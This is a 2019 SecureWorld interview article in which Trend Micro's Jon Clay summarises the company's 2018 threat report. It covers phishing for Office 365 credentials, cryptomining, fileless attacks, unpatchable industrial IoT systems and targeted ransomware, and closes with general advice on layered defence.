author photo
By Bruce Sussman
Fri | Apr 12, 2019 | 6:40 AM PDT

Which types of cybercrimes are surging?

How are some cyber attacks becoming more targeted?

And which vulnerabilities are difficult or impossible to fully patch and require a workaround?

We were eager to get answers to these questions in our ongoing SecureWorld Behind the Scenes interview series. 

Listen in as Jon Clay of Trend Micro uncovers the findings of new research in the company’s recently released 2018 Annual Security Roundup, "Caught in the Net: Unraveling the Tangle of Old and New Threats."

Play the complete conversation with Jon, or read excerpts below.

[SecureWorld] Jon, I think what our listeners want to know most is which type of attack vectors surged in 2018? What did your research discover?

[Jon Clay] What we saw was messaging attacks, socially engineered attacks, where the threat actors have shifted their tactic and are starting to look at things and ask, ‘how can I improve my infection rates?’ Socially engineered attacks against employees works and it works pretty well. So they really have moved towards that type of attack vector, especially using the messaging layer.

They're also looking at credential stealing attacks of email-based accounts, so we saw a huge increase in Office 365 attacks and credential phishing attacks. The attachment ultimately would pop an Office 365 login screen, the employees would then login thinking it was their corporate login account and the criminals would be able to steal that person’s login credentials.

The second attack we saw increase was cryptocurrency mining. That definitely surged in 2018, and it was one of the biggest increases we saw.

And then the last one utilized by attackers has been the fileless attacks, script-based attacks. These are threats that don’t have a file associated with them and it is a little more difficult for security folks to identify because there is no file, right? It’s in memory, it’s running the processes of the system and it’s a little more difficult to detect. We started to see a big increase in the use of this type of attack in 2018, as well.

[SW] One of the other things I know Trend Micro has focused on a lot is research around IoT and IIoT. What does the attack space look like there, based on what you uncovered?

[Clay] It’s an area we have a lot of concern about, and we just published a report on threats against Industry 4.0, which is primarily the IIoT space. The threat to these industrial IoT organizations and smart factories, probably the biggest one is outdated software. As such, they are going to have vulnerabilities associated with them which may not even be patchable because they’re unsupported operating systems. XP is unsupported by Microsoft now. So any vulnerability introduced today that works in XP operating system is not going to be fully patched.

Secondarily, IoT and IIoT, the devices themselves, especially in industrial IoT, the devices are old. They may have been produced 10 years ago and again, you’re going to introduce vulnerabilities across those periods of time that may not be patched—may not ever be patched. I call those vulnerabilities "forever days" instead of "zero days."

The biggest threat, in our opinion in this space, is outdated operating systems, outdated applications running on these devices and outdated firmware. Organizations need to understand these systems have to have some sort of patching, that’s where virtual patching, IPS, network-based IPS can help them and potentially block exploits targeting those devices.

[SW] One of the other things I came across in the report… you had this incredible statistic on the millions of threats blocked in 2018? What was that number, and how are you able to measure so many threats?

[Clay] It was 48 billion threats that we blocked, that were targeting our customer base last year in 2018. The majority of that were messaging based threats: spam, phishing, spear phishing attacks that we saw. A lot were tied to web-based attacks, and for your viewers listening to this, probably the best place to block an attack today if you want to preempt an attack today on your endpoints or employees is to look at your messaging layers, looking in your web layer and providing protection at those layers. So your improved messaging and web security will block a majority of the threats coming into your organization.

The other one, though, is files have continued to increase. File-based threats are still increasing, year over year.

[SW] What about ransomware? Last year it was conventional wisdom that ransomware was on the decline. What did your research find?

[Clay] Ransomware attacks against our customers were down, also the number of ransomware families identified were also down year over year. They are going much more targeted in their approach to ransomware, looking at organizations that have critical business systems that they can use systems to attack. Organizations that if any of their systems get encrypted and are brought down for any period of time it’s going to cause pain. Which also allows them to increase their ransom demands because if I have critical systems that are taking offline due to ransomware, the likelihood I will pay the ransom to get them back online quickly is much higher.

It’s going to continue to drop in 2019, but it will continue to become more targeted. One of the reasons we’ve seen a decrease in ransomware is the improved protection and detection capabilities in the security industry. The use of machine learning and artificial intelligence has improved our ability to detect new ransomware families as they come out, without even having to do updates. That has improved our ability to detect ransomware which means the threat actors behind it are seeing less ability to infect organizations.

[SW] The last thing I wanted to ask you about. What do all of these things tell us about the approach organizations should consider to protect themselves as we go through 2019?

[Clay] The multi-layered security structure is still the way to go about it. Make sure you have protection for your cloud-based assets, have protection at your gateway, your email messaging layer, your web layer... make sure you have network-based security in place looking at network IPS, looking at network traffic scanning. Making sure your endpoints including your servers are covered. And at each of those layers, you want to have multiple technologies in play to be able to detect. That full breadth of detection is going to be key.

And the other thing you need to do as an organization is to make sure you have the ability and the process in place in case you are attacked and there’s a successful attack against you. You need to be able to recover as quickly as possible.

Our interview only covered the highlights, so you may want to read Trend Micro’s full report for yourself. Here is the 2018 Annual Security Roundup, "Caught in the Net: Unraveling the Tangle of Old and New Threats."

It gives context to the scope and type of threats organizations are facing this year.